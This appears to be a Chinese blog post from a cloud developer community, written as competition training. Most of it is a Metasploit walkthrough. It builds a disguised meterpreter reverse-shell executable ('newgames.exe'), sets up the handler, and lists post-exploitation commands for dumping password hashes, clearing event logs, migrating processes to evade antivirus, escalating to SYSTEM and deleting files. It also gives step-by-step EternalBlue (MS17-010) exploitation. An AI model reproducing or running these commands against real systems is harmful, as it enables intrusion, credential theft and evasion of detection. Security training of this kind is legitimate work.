重点考核参赛选手网络系统安全策略部署、信息保护、网络安全运维管理的综合实践能力,具体包括:
(1)参赛选手能够在赛项提供的服务器上配置各种协议和服务,实现网络系统的运行,并根据网络业务需求配置各种安全策略,以满足应用需求。
(2)赛选手能够根据大赛提供的赛项要求,实施网络空间安全防护操作。
(3)参赛选手能够根据网络实际运行中面临的安全威胁,确定安全策略并部署实施,防范并制止网络恶意入侵和攻击行为。
(4)参赛选手通过分组混合对抗的形式,能够实时防护自己服务器,抵御外界的攻击,同时能够对目标进行渗透和攻击。
靶机:windows 2008 或者 windows7
操作端:bt5
环境要ping的通。
bt5中MSF工具很强大,他可以运行所有与自己兼容的脚本
1.制作一个脚本: cd /pentest/expoits/framework
./msfpayload windows/meterpreter/reverse_tcp LHOST =本地ip LPORT=33333 X > /tmp/newgames.exe
2.建立服务器
在命令行输入msfconsole 进入到MSF软件操作界面
use exploit/multi/handler //使用某某某
>set PAYLOAD windows/meterpreter/reverse_tcp //路径
>set LHOST 本地IP //设置本地ip
>set LPORT 33333
>exploit //运行
3.用共享文件将newgames.exe共享给windwos7,在windwos7中运行它,如果你有入侵的技术肯定更好,直接把文件上传到靶机
靶机打开后在bt5中会弹出一个meterpreter窗口
4.在meterpreter窗口中可以输入以下命令操作
下面调一些重要的功能介绍一下:
1. background:这个命令是将当前的session放到后台运行,可以在msf中继续其他渗透任务;
2. sessions:这个命令需要配合上面的background使用,该命令是将后台的会话打开,进行会话操作。
3. clearev:该命令是用来清除渗透的登录信息的,这个很有用。
4. hashdump:该命令是一个post模块,需要配合meterpreter使用,这个命令是用来获取目标系统的哈希值的,输入”run post/windows/gather/hashdump”
5. migrate:这个也是一个post模块。可以将meterpreter当前的进程移动到其他指定的进程中,这样做的好处是可以给meterpreter一个相对稳定的运行环境,同时可以很好的躲避杀软。
6. search:这个命令是用来搜索系统中的文件的。
7. shell:这个命令是返回目标系统的shell命令行,在windows下返回cmd命令行,在unix下返回sh命令行。
meterpreter > getsystem
利用已自漏洞,自动提权为SYSTEM
meterpreter >screenshot
获取目标电脑,屏幕截图
cd:切换目标目录;
cat:读取文件内容;
del:删除文件;
edit:使用vim编辑文件
ls:获取当前目录下的文件;se
mkdir:新建目录;
rmdir:删除目录;
永恒之蓝:
批量扫描器:https://github.com/holmesian/ms17_010_scan
先用扫描器扫描下活动网络的主机,后缀为yes的就是有漏洞
>msfconsole
>search 17_010 //查询漏洞
>use exploit/windows/smb/ms17_010_eternalblue //进入漏洞模块
>set RHOST 192.168.x.x //设置目标ip
>exploit //启动
ms17010(动静很大,目标有可能蓝屏)
vim /usr/share/metasploit-framework/scripts/meterpreter/vnc.rb 在if (not courtesy)下添加pay.datastore['ViewOnly'] = false
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。